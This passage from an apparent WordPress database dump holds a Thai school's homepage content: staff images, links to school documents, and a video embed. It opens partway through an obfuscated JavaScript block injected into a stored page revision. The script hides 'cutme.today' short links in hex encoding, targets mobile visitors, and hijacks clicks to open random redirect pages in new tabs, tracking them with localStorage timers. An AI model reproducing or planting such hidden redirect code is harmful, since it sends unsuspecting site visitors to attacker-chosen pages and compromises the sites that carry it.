9\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:34:54','2025-07-15 09:34:54','',19,'http://watprato.ssk.in.th/?p=717',0,'revision','',0),
(718,1,'2025-07-15 16:36:14','2025-07-15 09:36:14','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 